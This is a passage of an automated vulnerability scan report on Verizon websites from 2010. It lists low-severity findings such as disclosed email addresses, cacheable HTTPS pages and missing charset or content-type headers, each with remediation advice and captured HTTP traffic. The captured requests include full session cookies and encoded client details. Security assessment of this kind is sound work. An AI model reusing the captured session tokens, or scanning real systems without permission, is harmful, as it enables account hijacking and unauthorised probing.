ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76388
Expires: Sat, 20 Nov 2010 03:15:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:25 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:15:25 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:15:25 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:15:25 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:15:25 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
</Script>

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

9. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 103922
Expires: Sat, 20 Nov 2010 03:13:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:13:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<P class=copy>If you are already have a "you@yahoo.com" e-mail account, you can continue to access your mail separately if you wish. However, we highly recommend you give your existing you@yahoo.com account all the benefits of your new Yahoo!. This can be done at no additional charge by linking your "you@yahoo.com" account with your new Verizon Yahoo! account during the registration process. Just imagine all the added value you get from getting additional storage, premium spam functionality, premium virus prote
...[SNIP]...

10. Cacheable HTTPS response  previous  next
There are 3 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


10.1. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv/web/unprotected/showtime.aspx

Request

GET /fiostv/web/unprotected/showtime.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 78.123
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24516
Date: Sat, 20 Nov 2010 03:04:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=wb5cyl55wlsb3445xgv2idj4; path=/; HttpOnly
Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/


<html>
<body onload=ShowtimePlayer()>
<link rel="stylesheet" type="text/css" href="/fiostv/web/Resources/V_111510_1425/css/FTVStyles.css">

<script type="text/javascript">
var TargetURL = '
...[SNIP]...

10.2. https://www36.verizon.com/fiosvoice/terms/Terms_of_Service.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiosvoice/terms/Terms_of_Service.pdf

Request

GET /fiosvoice/terms/Terms_of_Service.pdf HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 113145
Content-Type: application/pdf
Content-Location: http://www36.verizon.com/fiosvoice/terms/Terms_of_Service.pdf
Last-Modified: Tue, 19 Oct 2010 15:17:37 GMT
Accept-Ranges: bytes
ETag: "4815c0c3a06fcb1:854c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Sat, 20 Nov 2010 03:04:16 GMT
Date: Sat, 20 Nov 2010 03:04:16 GMT
Connection: close

%PDF-1.6%....
99 0 obj<</Linearized 1/L 113145/O 102/E 37857/N 23/T 111118/H [ 2016 472]>>endobj
xref
99 86
0000000016 00000 n
0000002488 00000 n
0000002649 00000 n
0000002701
...[SNIP]...

10.3. https://www36.verizon.com/fiosvoice/userguide/User_Guide.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiosvoice/userguide/User_Guide.pdf

Request

GET /fiosvoice/userguide/User_Guide.pdf HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 5355590
Content-Type: application/pdf
Content-Location: http://www36.verizon.com/fiosvoice/userguide/User_Guide.pdf
Last-Modified: Tue, 31 Aug 2010 16:35:09 GMT
Accept-Ranges: bytes
ETag: "86fd27a2a49cb1:4c04"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Sat, 20 Nov 2010 03:04:20 GMT
Date: Sat, 20 Nov 2010 03:04:20 GMT
Connection: close

%PDF-1.6%....
20487 0 obj<</First 467/Length 722/Filter/FlateDecode/N 48/Type/ObjStm>>stream
x....j.@.E..@.G=..!d9...Y.,.G...c....>U..6$..&..9...E.R..9..{...Vk.V|.D.. .[..'.dC.I..P.t...6.A...CO..
...[SNIP]...

11. HTML does not specify charset  previous  next
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


11.1. http://www2.verizon.net/help/dsl_settings/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.verizon.net
Path:   /help/dsl_settings/

Request

GET /help/dsl_settings/ HTTP/1.1
Host: www2.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 139
Content-Type: text/html
Cache-Control: private
Date: Sat, 20 Nov 2010 03:06:55 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSQRTBTDT=IHPHDNIDIIFPACJGGLIHPLLP; path=/


           <script language="javascript">window.location = "http://my.verizon.com/micro/speedoptimizer/hsi/default.aspx"

</script>    
           


11.2. http://www35.vzw.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www35.vzw.com
Path:   /HG

Request

GET /HG HTTP/1.1
Host: www35.vzw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DM561203JAVSV6=V1rrrrr"rz%B^rB%irC%r%r%^Qz%zrz%B"%B^rB%irC%z%B^rB%irC%"%B^rB%irQX"%B^rB%irC%r%r%^Q"%Bz(xB$qUfxB$qUxB$haF2_aTf2I~xB$m3qah2U:TxB$m3Icc:DTfxB$~:W2TxB(IFGKz7}z)OuKr6%r^zA6qUf6qU6haF2_aTf2I~6m3qah2U:T6m3Icc:DTf6~:W2T|IFGK; CTG=1290218053; WSS_GW=V1z%B^rB%@ieC; V1Z2=CT; DM570203L6VDV6=V1rrrrr"rz%B^rB%@ieCrire@Bz%zrz%i^"%B^rB%@ieCz%B^rB%@ieC"%B^rB%irQX"%B^rB%@ieCrire@B"%Bz(xB$m2ch:F2faFxB$GffxB$O:maz7}z)OuKr6%%zA6m2ch:F2faF6Gff6O:maA6qUf6qU6haF2_aTf2I~6m3qah2U:T6m3Icc:DTf6~:W2T|IFGK; DM570118F3VNV6=V1rrrrr"rz%B^rB%@ieCrire@Bz%zrzr"%B^rB%@ieCz%B^rB%@ieC"%B^rB%@ieC"%B^rB%@ieCrire@B"rz(xB$m2ch:F2faFxB$GffxB$O:maz7}z)OuKr6%%zA6m2ch:F2faF6Gff6O:ma;

Response

HTTP/1.1 400 Bad Request
Date: Sat, 20 Nov 2010 03:03:30 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Connection: close
Pragma: no-cache
Cache-Control: max-age=0, private, proxy-revalidate
Expires: Sat, 20 Nov 2010 03:03:31 GMT
Content-Type: text/html
Content-Length: 58

<html>
<body>
<p>400 Bad Request</p>
</body>
</html>

12. Content type is not specified  previous
There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


12.1. http://www36.verizon.com/fiostv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www36.verizon.com
Path:   /fiostv

Request

GET /fiostv HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Content-Length: 62
Expires: Sat, 20 Nov 2010 03:04:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:04:00 GMT
Connection: close

<html><body><b>Http/1.1 Service Unavailable</b></body> </html>

12.2. https://www36.verizon.com/fiostv  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv

Request

GET /fiostv HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Content-Length: 62
Expires: Sat, 20 Nov 2010 03:04:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:04:07 GMT
Connection: close

<html><body><b>Http/1.1 Service Unavailable</b></body> </html>

Report generated by XSS.CX at Fri Nov 19 21:15:35 CST 2010.